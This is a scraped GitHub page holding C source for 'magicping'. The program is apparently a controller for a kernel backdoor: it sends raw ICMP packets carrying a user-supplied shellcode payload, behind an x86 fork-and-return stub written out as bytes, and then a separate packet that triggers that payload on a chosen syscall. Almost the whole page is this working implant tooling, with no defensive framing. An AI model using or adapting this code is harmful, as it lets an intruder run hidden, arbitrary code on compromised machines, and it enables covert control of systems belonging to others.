Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
tree: 04118925a9
Fetching contributors…

Cannot retrieve contributors at this time

146 lines (118 sloc) 2.937 kB
#include <stdio.h>
#include <sys/socket.h>
#include <linux/icmp.h>
#include <string.h>
#include <netinet/ip.h>
#include <stdlib.h>
#include <getopt.h>
#include <sys/stat.h>
#include <sys/fcntl.h>
/* Preserves syscall return code, forks, and parent jumps
* to original saved EIP */
static char forker[] =
"\x50" /* push eax */
"\x6a\x02" /* push 0x2 */
"\x58" /* pop eax */
"\xcd\x80" /* int 0x80 */
"\x85\xc0" /* test eax,eax */
"\x74\x13" /* je shellcode */
"\x58" /* pop eax */
"\x89\xe3" /* mov ebx,esp */
"\x66\x81\xe3\x00\xf0" /* and bx,0xf000 */
"\x81\xeb\x00\x10\x00\x00" /* sub ebx,0x1000 */
"\x8b\x5b\xfc" /* mov ebx,DWORD PTR [ebx-0x4] */
"\xff\xe3"; /* jmp ebx */
void usage(void)
{
printf("Usage: magicping [-i shellcode.o] [-t syscall] destination\n");
exit(1);
}
int main(int argc, char * argv[])
{
int sock, fd, i, ch, install, trigger, syscall;
char *shellcode;
char *ip;
char data[1024];
struct stat st;
struct iovec iov;
struct msghdr m;
struct sockaddr_in saddr;
struct {
struct cmsghdr cm;
struct in_pktinfo ipi;
} cmsg = { {sizeof(struct cmsghdr) + sizeof(struct in_pktinfo),
SOL_IP, IP_PKTINFO}, {0, }};
/* Defaults */
install = trigger = syscall = 0;
while ((ch = getopt(argc, argv, "i:t:h")) != EOF) {
switch (ch) {
case 'i':
install++;
shellcode = optarg;
break;
case 't':
trigger++;
syscall = atoi(optarg);
break;
case 'h':
usage();
}
}
argc -= optind;
argv += optind;
if (argc == 0)
usage();
ip = argv[0];
sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
if (sock < 0) {
printf("[*] Failed to open raw socket.\n");
return -1;
}
memset(data, 0, sizeof(data));
memset(&saddr, 0, sizeof(saddr));
memset(&m, 0, sizeof(m));
saddr.sin_family = AF_INET;
inet_aton(ip, &saddr.sin_addr);
data[0] = ICMP_ECHO; /* type */
data[1] = 0; /* code */
data[2] = 0x34; /* checksum isn't validated, */
data[3] = 0x12; /* use as tag */
iov.iov_base = data;
m.msg_name = &saddr;
m.msg_namelen = sizeof(saddr);
m.msg_iov = &iov;
m.msg_iovlen = 1;
m.msg_control = &cmsg;
m.msg_controllen = sizeof(cmsg);
if (install) {
data[4] = 0; /* 0 = install */
fd = open(shellcode, O_RDONLY);
if (fd < 0) {
printf("[*] Failed to open %s\n", shellcode);
return -1;
}
if (fstat(fd, &st)) {
printf("[*] Failed to fstat %s\n", shellcode);
return -1;
}
if (st.st_size > 1024 - 8 - (sizeof(forker) - 1)) {
printf("[*] Shellcode is too big.\n");
return -1;
}
memcpy(&data[8], forker, sizeof(forker) - 1);
if (read(fd, &data[8 + sizeof(forker) - 1], st.st_size) !=
st.st_size) {
printf("[*] Failed to read shellcode.\n");
return -1;
}
close(fd);
iov.iov_len = 8 + sizeof(forker) - 1 + st.st_size;
sendmsg(sock, &m, 0);
}
if (trigger) {
data[4] = 1; /* 1 = trigger */
data[5] = (char)syscall;
iov.iov_len = 8;
sendmsg(sock, &m, 0);
}
}
Jump to Line
Something went wrong with that request. Please try again.